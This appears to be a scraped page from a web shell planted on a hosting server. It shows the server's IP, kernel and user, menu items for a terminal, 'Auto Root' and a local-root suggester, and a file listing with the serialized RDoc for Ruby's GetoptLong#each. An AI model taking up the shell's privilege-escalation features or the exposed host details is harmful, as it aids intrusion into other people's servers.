Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
GetoptLong /
Delete
Unzip
Name
Size
Permission
Date
Action
AmbiguousOption
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
Error
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
InvalidOption
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
MissingArgument
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
NeedlessArgument
[ DIR ]
drwxr-xr-x
2026-05-05 23:08
cdesc-GetoptLong.ri
15.14
KB
-rw-r--r--
2026-04-07 17:42
each-i.ri
1.45
KB
-rw-r--r--
2026-04-07 17:42
each_option-i.ri
264
B
-rw-r--r--
2026-04-07 17:42
error%3f-i.ri
310
B
-rw-r--r--
2026-04-07 17:42
error-i.ri
308
B
-rw-r--r--
2026-04-07 17:42
error_message-i.ri
400
B
-rw-r--r--
2026-04-07 17:42
get-i.ri
640
B
-rw-r--r--
2026-04-07 17:42
get_option-i.ri
261
B
-rw-r--r--
2026-04-07 17:42
new-c.ri
1.01
KB
-rw-r--r--
2026-04-07 17:42
ordering%3d-i.ri
1.05
KB
-rw-r--r--
2026-04-07 17:42
ordering-i.ri
298
B
-rw-r--r--
2026-04-07 17:42
quiet%3f-i.ri
579
B
-rw-r--r--
2026-04-07 17:42
quiet-i.ri
577
B
-rw-r--r--
2026-04-07 17:42
set_error-i.ri
331
B
-rw-r--r--
2026-04-07 17:42
set_options-i.ri
530
B
-rw-r--r--
2026-04-07 17:42
terminate-i.ri
403
B
-rw-r--r--
2026-04-07 17:42
terminated%3f-i.ri
357
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI" each:ETI"GetoptLong#each;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"-Calls the given block with each option; ;TI"1each option is a 2-element array containing:;To:RDoc::Markup::BlankLine o:RDoc::Markup::List: @type:BULLET:@items[o:RDoc::Markup::ListItem:@label0; [o; ; [I"5The option name (the name itself, not an alias).;To;;0; [o; ; [I"The option value.;T@o; ; [I" Example:;T@o:RDoc::Markup::Verbatim; [I"require 'getoptlong' ;TI" ;TI"options = GetoptLong.new( ;TI"7 ['--xxx', '-x', GetoptLong::REQUIRED_ARGUMENT], ;TI"7 ['--yyy', '-y', GetoptLong::OPTIONAL_ARGUMENT], ;TI"/ ['--zzz', '-z',GetoptLong::NO_ARGUMENT] ;TI") ;TI"#puts "Original ARGV: #{ARGV}" ;TI"(options.each do |option, argument| ;TI" p [option, argument] ;TI" end ;TI"$puts "Remaining ARGV: #{ARGV}" ;T:@format0o; ; [I"Command line:;T@o;; [I"9ruby each.rb -xxx Foo -x Bar --yyy Baz -y Bat --zzz ;T;0o; ; [I"Output:;T@o;; [I"WOriginal ARGV: ["-xxx", "Foo", "-x", "Bar", "--yyy", "Baz", "-y", "Bat", "--zzz"] ;TI"["--xxx", "xx"] ;TI"["--xxx", "Bar"] ;TI"["--yyy", "Baz"] ;TI"["--yyy", "Bat"] ;TI"["--zzz", ""] ;TI"Remaining ARGV: ["Foo"];T;0: @fileI"lib/getoptlong.rb;T:0@omit_headings_from_table_of_contents_below00I"!option_name, option_argument;T[[I"each_option;To;; [ ;@?;0I"();T@?FI"GetoptLong;TcRDoc::NormalClass00